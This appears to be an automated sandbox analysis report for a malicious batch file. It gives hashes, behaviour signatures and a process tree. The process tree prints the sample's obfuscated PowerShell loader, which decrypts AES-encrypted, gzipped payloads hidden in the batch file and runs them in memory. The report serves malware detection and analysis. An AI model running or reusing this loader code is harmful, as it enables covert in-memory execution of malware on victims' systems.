Analysis
-
max time kernel
120s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
30-05-2024 13:25
Static task
static1
Behavioral task
behavioral1
Sample
myxwr5cli.bat
Resource
win7-20240221-en
4 signatures
150 seconds
General
-
Target
myxwr5cli.bat
-
Size
379KB
-
MD5
03c6c2175f84ad54c989f0608d3cbb57
-
SHA1
9846d7aa4c639d038f428977dfe0eef7db8ac009
-
SHA256
6d04562cf9d1e0ee7b7c77af40e1e3299b6eba9375f35978d9776d94a9dae3d7
-
SHA512
45bc9713a632904216f5bfd3e5648542382bc5c3aa8fa5253eea9f04d6592ac0aabcffc02451261210835f4f4d57c1f4895b7d02be24dd5edffbdc5e5b5e13c8
-
SSDEEP
6144:xdlplCiywRsuBfq3Y3zzyMECoefagF68zh3IHstkjcGH9z2eRTbYXa8KZITbq:xrCiHWuBS3Y3zzyDCoefPQsy/qeF6KZl
Score
8/10
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 2696 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2696 powershell.exe -
Suspicious use of WriteProcessMemory 9 IoCs
Processes:
cmd.exedescription pid process target process PID 1924 wrote to memory of 1708 1924 cmd.exe cmd.exe PID 1924 wrote to memory of 1708 1924 cmd.exe cmd.exe PID 1924 wrote to memory of 1708 1924 cmd.exe cmd.exe PID 1924 wrote to memory of 2188 1924 cmd.exe cmd.exe PID 1924 wrote to memory of 2188 1924 cmd.exe cmd.exe PID 1924 wrote to memory of 2188 1924 cmd.exe cmd.exe PID 1924 wrote to memory of 2696 1924 cmd.exe powershell.exe PID 1924 wrote to memory of 2696 1924 cmd.exe powershell.exe PID 1924 wrote to memory of 2696 1924 cmd.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\myxwr5cli.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1924 -
C:\Windows\system32\cmd.execmd /c "set __=^&rem"2⤵PID:1708
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('cP+qKNutTynKUkrEYUHXrfgFt+qGd2k9eoIQyTxHELs='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('w4Vmy/houRSXsK7A9z6kzA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $lvUHo=New-Object System.IO.MemoryStream(,$param_var); $UxGoq=New-Object System.IO.MemoryStream; $NiPKr=New-Object System.IO.Compression.GZipStream($lvUHo, [IO.Compression.CompressionMode]::Decompress); $NiPKr.CopyTo($UxGoq); $NiPKr.Dispose(); $lvUHo.Dispose(); $UxGoq.Dispose(); $UxGoq.ToArray();}function execute_function($param_var,$param2_var){ $KkPkD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $zNDLa=$KkPkD.EntryPoint; $zNDLa.Invoke($null, $param2_var);}$XLuZt = 'C:\Users\Admin\AppData\Local\Temp\myxwr5cli.bat';$host.UI.RawUI.WindowTitle = $XLuZt;$fEYHc=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($XLuZt).Split([Environment]::NewLine);foreach ($OYqiR in $fEYHc) { if ($OYqiR.StartsWith('yCOdwoiwmunBFrPLojaG')) { $RNNcG=$OYqiR.Substring(20); break; }}$payloads_var=[string[]]$RNNcG.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "2⤵PID:2188
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2696
-